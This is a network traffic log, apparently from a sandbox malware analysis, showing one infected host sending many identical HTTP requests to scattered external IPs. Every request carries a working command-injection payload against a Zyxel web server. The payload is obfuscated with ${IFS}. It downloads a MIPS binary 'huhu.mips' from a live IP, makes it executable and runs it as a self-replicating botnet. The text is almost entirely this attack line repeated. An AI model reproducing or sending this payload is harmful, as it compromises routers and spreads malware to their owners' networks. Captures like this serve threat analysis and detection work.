                                                      Feb 2, 2024 06:35:30.265492916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      640192.168.2.1459850194.73.160.112443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:30.265511036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      641192.168.2.1433448144.49.134.114443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:31.269876957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      642192.168.2.144259076.53.78.160443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:31.269925117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      643192.168.2.145163231.213.223.254443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:31.269951105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      644192.168.2.1436450144.144.193.143443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:31.269985914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      645192.168.2.1455616145.211.161.154443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:31.270056009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      646192.168.2.1454376156.238.93.127443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:31.270073891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      647192.168.2.145699842.69.35.36443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:31.270133972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      648192.168.2.144004458.175.127.230443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:31.270149946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      649192.168.2.1438974148.33.235.18443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:31.270338058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      650192.168.2.145409813.216.237.38443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:32.273755074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      651192.168.2.1451038124.129.213.23443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:32.273797989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      652192.168.2.1433322198.181.9.193443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:32.273844004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      653192.168.2.1451606170.153.209.16443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:32.273902893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      654192.168.2.1444904183.209.143.64443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:33.277836084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      655192.168.2.144038087.157.15.162443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:33.277879953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      656192.168.2.1446812125.36.62.160443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:33.277918100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      657192.168.2.145119474.133.136.125443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:33.277972937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      658192.168.2.144863281.224.169.160443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:33.277987003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      659192.168.2.1459768155.167.90.142443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:33.278069973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      660192.168.2.143690641.216.32.113443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:33.278111935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      661192.168.2.1448952169.30.57.116443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:34.282022953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      662192.168.2.1450666210.75.228.23443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:34.282068968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      663192.168.2.146024614.140.45.199443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:36.293808937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      664192.168.2.1453176150.195.96.134443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:36.293879032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      665192.168.2.1436982176.40.36.8443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:37.299693108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      666192.168.2.1450892182.214.253.65443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.327054024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      667192.168.2.1432870140.47.44.108443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.327121973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      668192.168.2.144689487.21.76.171443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.327199936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      669192.168.2.143474454.192.212.134443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.327244997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      670192.168.2.1433568129.199.20.38443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.327317953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      671192.168.2.144499073.16.128.9443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.327377081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      672192.168.2.1446820221.46.213.107443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.327480078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      673192.168.2.1450064217.191.91.125443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.327497959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      674192.168.2.145011623.112.111.183443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.327563047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      675192.168.2.1443394183.232.105.197443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.327600002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      676192.168.2.143549440.201.20.163443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.327646017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      677192.168.2.1438284110.167.222.196443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.327703953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      678192.168.2.145154078.179.204.49443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.327770948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      679192.168.2.144812450.42.16.19443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.327796936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      680192.168.2.144273250.124.220.135443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.327860117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      681192.168.2.143677857.238.202.249443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.327920914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      682192.168.2.1458220163.185.22.11443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.327971935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      683192.168.2.145785072.196.136.247443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.328030109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      684192.168.2.143975252.162.173.217443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.328079939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      685192.168.2.1450228201.92.237.135443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.328155041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      686192.168.2.1459662150.32.233.250443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.328191042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      687192.168.2.1448732166.184.137.202443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.328246117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      688192.168.2.144506854.160.203.166443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.328310966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      689192.168.2.1438734153.52.112.44443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.328365088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      690192.168.2.1459282151.11.98.208443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.328423023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      691192.168.2.1437254144.168.84.40443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.328479052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      692192.168.2.1453336199.227.130.122443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.328502893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      693192.168.2.1435034141.109.30.179443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.328555107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      694192.168.2.1458588123.248.97.14443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.328610897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      695192.168.2.1450324129.160.146.18443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.328661919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      696192.168.2.144768617.222.237.236443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.328707933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      697192.168.2.1434882200.111.80.221443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.328790903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      698192.168.2.145729846.161.16.121443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.328866959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      699192.168.2.1446530103.228.201.90443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.328922987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      700192.168.2.1453184198.109.103.197443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.328960896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      701192.168.2.1447916109.128.101.206443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.329029083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      702192.168.2.1447152175.184.6.212443
                                                      TimestampBytes transferredDirectionData
